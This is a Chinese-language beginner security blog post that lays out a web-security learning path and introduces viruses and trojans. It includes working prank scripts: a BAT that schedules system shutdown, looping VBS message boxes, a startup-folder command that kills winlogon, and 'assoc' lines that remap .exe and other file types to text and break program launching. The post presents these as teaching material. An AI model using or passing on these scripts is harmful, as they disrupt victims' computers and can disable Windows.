也許每個人出生的時候都以為這世界都是為他一個人而存在的,當他發現自己錯的時候,他便開始長大
少走了彎路,也就錯過了風景,無論如何,感謝經歷
更多關于Android安全的知識,可前往:https://blog.csdn.net/ananasorangey/category11955914.html


這篇文章將簡單敘述Web安全學習路線,并實現了最簡單的木馬和病毒代碼,希望對讀者有所幫助。
本文參考了DNSec-leo老師的課程,同時也結合了作者之前的編程經驗進行講解。作者作為網絡安全的小白,分享一些自學基礎教程給大家,希望你們喜歡。同時,更希望你能與我一起操作深入進步,后續也將深入學習網絡安全和系統安全知識并分享相關實驗??傊?,希望該系列文章對博友有所幫助,寫文不容易,大神請飄過,不喜勿噴,謝謝!
從2019年7月開始,我來到了一個陌生的專業——網絡空間安全。初入安全領域,是非常痛苦和難受的,要學的東西太多、涉及面太廣,但好在自己通過分享100篇“網絡安全自學”系列文章,艱難前行著。感恩這一年相識、相知、相趣的安全大佬和朋友們,如果寫得不好或不足之處,還請大家海涵!
接下來我將開啟新的安全系列,叫“系統安全”,也是免費的100篇文章,作者將更加深入的去研究惡意樣本分析、逆向分析、內網滲透、網絡攻防實戰等,也將通過在線筆記和實踐操作的形式分享與博友們學習,希望能與您一起進步,加油~推薦前文:網絡安全自學篇系列-100篇
https://blog.csdn.net/eastmount/category_9183790.html
話不多說,讓我們開始新的征程吧!您的點贊、評論、收藏將是對我最大的支持,感恩安全路上一路前行,如果有寫得不好或侵權的地方,可以聯系我刪除。基礎性文章,希望對您有所幫助,作者目的是與安全人共同進步,加油~
文章目錄:
一.攻防安全及案例
1.網絡安全學習路線
2.安全威脅案例
3.APT攻擊高級
二.病毒初探
1.關機BAT腳本
2.搞笑VBS腳本
3.文件格式修改
4.網頁JS代碼
三.木馬初探
四.總結
作者的github資源:
逆向分析:https://github.com/eastmountyxz/
SystemSecurity-ReverseAnalysis
網絡安全:https://github.com/eastmountyxz/
NetworkSecuritySelf-study
聲明:本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網絡需要我們共同維護,更推薦大家了解它們背后的原理,更好地進行防護。該樣本不會分享給大家,分析工具會分享。
基礎知識:?Web發展簡史、計算機網絡、域名系統、HTTP標準、代碼審計、WAF
信息收集:?域名信息、 站點信息、端口信息、其它
內網滲透:?Windows信息收集、持久化、Linux信息收集、痕跡清理、其他
常見漏洞:?SQL注入、XSS、CSRF、SSRF、命令注入、文件讀取、文件上傳、文件包含、XXE、模版注入、Xpath注入、 邏輯漏洞 、業務漏洞、配置安全、中間件、Web Cache欺騙攻擊
語言與框架:?PHP、Python、Java、JavaScript、Ruby、C\C++、C#
防御技術:?總體思路、 團隊建設、威脅情報、風險控制、加固檢查、蜜罐技術、入侵檢測、應急響應、溯源分析
工具與資源:?工具列表、推薦資源、爆破工具、下載工具、流量相關、嗅探工具、SQLMap使用
其他:?認證方式、拒絕服務攻擊、DNS劫持、Docker
AI騷擾電話:?又稱智能騷擾電話機器人,AI電話機器人模擬一種甜美的聲音進行電話推銷,并應用于各個領域,如保險、地產、教育、汽車、貸款等。
WiFi探針盒子:?當用戶手機無線局域網處理打開狀態時,會向周圍發出尋找無線網絡的信號,探針盒子發現這個信號,就能迅速識別出用戶手機的MAC地址。而MAC地址可以轉換成IMEI號,再轉換成手機號碼。為了獲取更多用戶個人信息,一些公司將這個小白盒子放在商場、超市、便利店、寫字樓等,在用戶毫不知情的情況下,搜集個人信息。
APP索取敏感信息:?某些手機APP惡意收集用戶隱私信息 ,并生成用戶畫像,通過電話、短信、微信、QQ等發送個性化廣告。APP安裝時,需要同意權限才能安裝,此時它能讀取用戶信息,比如315晚會曝光的墨跡天氣APP隱私泄露案例。
新建文本文檔
輸入 shutdown -s -t 600
把txt改成bat
shutdown -s -t 600
//現在讓系統600秒之后關機
shutdown -a
//終止關閉計算機
新建文本文檔
輸入 msgbox"Eastmount love CSDN, 你最帥!"
把txt改成vbs
do
msgbox"Eastmount love CSDN, 你最帥!"
loop
ntsd -c q -pn winlogon.ex
txt修改為bat
開始->程序->啟動(右鍵)打開->把bat文件放入
set ws=createobject("wscript.shell")
sub shutfun(s)
select case s
case 1
ws.run"cmd.exe /c shutdown -s -t 300"
case 2
ws.run"cmd.exe /c shutdown -a"
end select
end sub
call shutfun(1)
do while a<>"我喜歡豬"
a=inputbox("你喜歡娜女神還是豬,快在對話框中輸入喜歡豬,否則后果自負,快輸""我喜歡豬"" ","輸不輸","")
loop
msgbox "早說就行了嘛"
msgbox"再輸一遍我是豬!"
msgbox"我是豬!"
MsgBox"最后一次!"
MsgBox"如果你很快的點過去,不看的話"
MsgBox"我就要你踩我空間的!哼!"
MsgBox"從前有座山!"
MsgBox"山里有個廟."
MsgBox"廟里有個老和尚在講故事."
ws.run"iexplore.exe https://blog.csdn.net/Eastmount"
msgbox"哎呀累了!數綿羊哄我睡覺"
for i=1 to 20
MsgBox i&"只綿羊"
next
msgbox"哎呀我困了,這次就饒過你吧,下次注意哦!"
msgbox"最后問個問題,我是不是大好人!"
call shutfun(2)
if inputbox("是不是","請選擇","是")<>"是" then
call shutfun(1)
end if
新建文本文檔
增加代碼:assoc.exe=txtfile
txt修改為bat
assoc.exe=exefile
assoc .htm=txtfile
assoc .dat=txtfile
assoc .com=txtfile
assoc .rar=txtfile
assoc .gho=txtfile
assoc .mvb=txtfile
...
隱蔽性
潛伏性
再生性
客戶端程序:安裝在攻擊者(黑客)方的控制臺,它負責遠程遙感指揮
服務端程序:木馬程序,它被隱藏安裝在被攻擊(受害)方的電腦上
遠程控制木馬:冰河木馬
鍵盤屏幕記錄木馬:QQ密碼記錄器
反彈窗口型木馬:廣外女生、網絡神偷
DDoS攻擊木馬
自啟動功能:添加到啟動項、修改組策略、修改注冊表、捆綁
隱蔽性:木馬本身的隱蔽性、運行時的隱蔽性、通信時的隱蔽性
學安全一年,認識了很多安全大佬和朋友,希望大家一起進步。這篇文章中如果存在一些不足,還請海涵。作者作為網絡安全和系統安全初學者的慢慢成長路吧!希望未來能更透徹撰寫相關文章。同時非常感謝參考文獻中的安全大佬們的文章分享,深知自己很菜,得努力前行。編程沒有捷徑,逆向也沒有捷徑,它們都是搬磚活,少琢磨技巧,干就對了。什么時候你把攻擊對手按在地上摩擦,你就贏了,也會慢慢形成了自己的安全經驗和技巧。加油吧,少年希望這個路線對你有所幫助,共勉。
前文分享(下面的超鏈接可以點擊喔):
[網絡安全] 一.Web滲透入門基礎與安全術語普及
[網絡安全] 二.Web滲透信息收集之域名、端口、服務、指紋、旁站、CDN和敏感信息
[網絡安全] 三.社會工程學那些事及IP物理定位
[網絡安全] 四.手工SQL注入和SQLMAP入門基礎及案例分析
[網絡安全] 五.XSS跨站腳本攻擊詳解及分類-1
[網絡安全] 六.XSS跨站腳本攻擊靶場案例九題及防御方法-2
[網絡安全] 七.Burp Suite工具安裝配置、Proxy基礎用法及暴庫入門
[網絡安全] 八.Web漏洞及端口掃描之Nmap、ThreatScan和DirBuster
[網絡安全] 九.Wireshark安裝入門及抓取網站用戶名密碼-1
[網絡安全] 十.Wireshark抓包原理、ARP劫持、MAC泛洪及數據追蹤
[網絡安全] 十一.Shodan搜索引擎詳解及Python命令行調用
[網絡安全] 十二.文件上傳漏洞 (1)基礎原理及Caidao入門知識
[網絡安全] 十三.文件上傳漏洞 (2)常用繞過方法及IIS6.0解析漏洞
[網絡安全] 十四.文件上傳漏洞 (3)編輯器漏洞和IIS高版本漏洞及防御
[網絡安全] 十五.文件上傳漏洞 (4)Upload-labs靶場及CTF題目01-10
[網絡安全] 十六.文件上傳漏洞 (5)繞狗一句話原理和繞過安全狗
[網絡安全] 十八.Metasploit技術之基礎用法萬字詳解及MS17-010漏洞
[網絡安全] 十九.Metasploit后滲透技術之信息收集和權限提權
[網絡安全] 二十.Metasploit后滲透技術之移植漏洞、深度提權和后門
[網絡安全] 二十一.Chrome密碼保存滲透解析、Chrome藍屏漏洞及音樂軟件漏洞復現
[網絡安全] 二十二.Powershell基礎入門及常見用法-1
[網絡安全] 二十三.Powershell基礎入門之常見語法及注冊表操作-2
[網絡安全] 二十四.Web安全學習路線及木馬、病毒和防御初探
2020年8月18新開的“娜璋AI安全之家”,主要圍繞Python大數據分析、網絡空間安全、人工智能、Web滲透及攻防技術進行講解,同時分享CCF、SCI、南核北核論文的算法實現。娜璋之家會更加系統,并重構作者的所有文章,從零講解Python和安全,寫了近十年文章,真心想把自己所學所感所做分享出來,還請各位多多指教,真誠邀請您的關注!謝謝。2021年繼續加油!

(By:Eastmount 2021-03-20?周日夜于武漢)
參考文獻:
機器學習在安全攻防場景的應用與分析 - 騰訊云FreeBuf官方
《安全之路Web滲透技術及實戰案例解析》陳小兵老師
https://www.bilibili.com/video/av60018118 (B站白帽黑客教程)
https://www.bilibili.com/video/av63038037
https://www.bilibili.com/video/av68215785
WAF從入門到Bypass再到放棄 - 小迪安全
你以為你有很多路可以選擇,其實你只有一條路可以走